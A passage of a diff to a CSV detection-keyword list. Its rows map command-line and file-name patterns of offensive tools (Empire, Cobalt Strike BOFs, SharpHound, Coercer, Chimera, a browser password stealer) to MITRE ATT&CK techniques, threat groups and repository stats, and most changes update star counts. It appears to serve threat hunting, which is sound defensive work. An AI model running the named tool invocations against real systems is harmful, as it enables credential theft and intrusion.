- TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ChildPath *sdclt.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* chimera.py *","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"* chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* chimera_automation *.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" "* chrome logindata *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* chrome masterkey *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" @@ -309,81 +309,81 @@ "* client.py -s http*:5000 --cert /*.pem*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "* clock-skew.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Clone_Token /Process:* /Command:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"* cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"* cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" -"* cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"* cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"* cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* coap-resources.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -cobalt *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"* coerce * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* coerce -u * -p * --listener-ip*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"* Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"* coerce * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* coerce -u * -p * --listener-ip*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"* Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "* CoffeeExecuteFunction*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" "* collect activedirectory --*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" -"* --collectallproperties*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --CollectionMethod All *ldap*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --CollectionMethod All *--ZipFileName *.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* -CollectionMethod All*loggedon*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"* -CollectionMethod LoggedOn -Verbose*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"* -CollectionMethod stealth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* --collectionmethods ACL*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods ComputerOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods Container*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods DCOM","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods DCOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods GPOLocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods Group*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods LocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods LoggedOn*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods ObjectProps*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods PSRemote*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods RDP*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods Session*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods Trusts*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* com.blackh4t*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"* --collectallproperties*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --CollectionMethod All *ldap*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --CollectionMethod All *--ZipFileName *.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* -CollectionMethod All*loggedon*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"* -CollectionMethod LoggedOn -Verbose*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"* -CollectionMethod stealth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 